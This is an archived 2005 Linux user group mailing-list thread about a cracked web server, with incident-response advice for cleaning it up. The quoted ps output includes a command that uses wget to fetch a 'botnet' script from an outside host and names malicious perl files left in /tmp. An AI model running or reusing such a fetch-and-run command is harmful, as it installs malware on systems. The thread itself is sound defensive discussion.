l i n u x - u s e r s - g r o u p - o f - d a v i s
Next Meeting:
July 7: Social gathering
Next Installfest:
Latest News:
Jun. 14: June LUGOD meeting cancelled
Page last updated:
2005 Feb 15 15:39

The following is an archive of a post made to our 'vox-tech mailing list' by one of its subscribers.

Report this post as spam:

(Enter your email address)
Re: [vox-tech] lugod.org cracked?
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [vox-tech] lugod.org cracked?

2 tools:
1) Rootkit with local exploits
2) IRC Relay with authentication and bounce... probably a file server for
dcc requests of pr0n, movies, or music.

You will want to down the box and run some integrity checking scripts to
verify the applications installed are from the packages you have

You will want to find all setUID scripts/apps on the system and check
/etc/password for new accounts.

It would be a good idea to track the time of the event to the files with
the earliest creations stamp. Look for any files owned by apache user or
group on the system which are not where they should be (most will be in
publicly writable spaces like /tmp /var/tmp /usr/tmp, etc)

Associate the creation time of these files with entries in your web server
logs.... you may not be able to find an error with the cirrect time if a
service/daemon faulted before it could write a log entry.

Is lugod.org running an file integrity checker?

Inspect all php files for modification and trojans that may have been left

You may have a cache of videos/music/stuff left behind too.

You don't know what other rootkits may have been used. even init could
have been trojaned. It is also possible for modules to be loaded and
hidden from listing/view.

Check everything. If that is too much work, backup to tape, clean install,
and only move files over that have been sanitized.


ME said:
> Most common trojan/exploit is for irc relays.
> Guess for entry? Did you upgrade php and apache after those security holes
> were found a while back?
> could you send me a copy of the binary files you have found in
> /tmp/.image? (Thanks.)
> -ME
> Rod Roark said:
>> I found that something was sucking up all my bandwidth late
>> this morning.  ps -aux showed this:
>> apache    3267  0.0  0.0   2560  1024 ?        S    11:14   0:00 sh -c
>> wget leblocks.sytes.net/botnet | grep abcdeee 2>&1 3>&1
>> apache    3268  0.0  0.1   3060  1460 ?        S    11:14   0:00 wget
>> leblocks.sytes.net/botnet
>> apache    3269  0.0  0.0   1416   448 ?        S    11:14   0:00 grep
>> abcdeee
>> After killing all processes owned by apache and doing a bit
>> of checking around, I found these perl scripts in
>> /tmp/.images:
>> -rw-r--r--   1 apache apache 20281 Feb 15 12:13 botnet
>> -rw-r--r--   1 apache apache  9592 Oct 12 23:23 pv
>> -rw-r--r--   1 apache apache  9592 Oct 12 23:23 pv.1
>> They are definitely malicious.  Does anyone know what this
>> malware is?
>> -- Rod
>> _______________________________________________
>> vox-tech mailing list
>> vox-tech@lists.lugod.org
>> http://lists.lugod.org/mailman/listinfo/vox-tech
> _______________________________________________
> vox-tech mailing list
> vox-tech@lists.lugod.org
> http://lists.lugod.org/mailman/listinfo/vox-tech

vox-tech mailing list

LUGOD Group on LinkedIn
Sign up for LUGOD event announcements
Your email address:
LUGOD Group on Facebook
'Like' LUGOD on Facebook:

Hosting provided by:
Sunset Systems
Sunset Systems offers preconfigured Linux systems, remote system administration and custom software development.

LUGOD: Linux Users' Group of Davis
PO Box 2082, Davis, CA 95617
Contact Us

LUGOD is a 501(c)7 non-profit organization
based in Davis, California
and serving the Sacramento area.
"Linux" is a trademark of Linus Torvalds.

Sponsored in part by:
Appahost Applications
For a significant contribution towards our projector, and a generous donation to allow us to continue meeting at the Davis Library.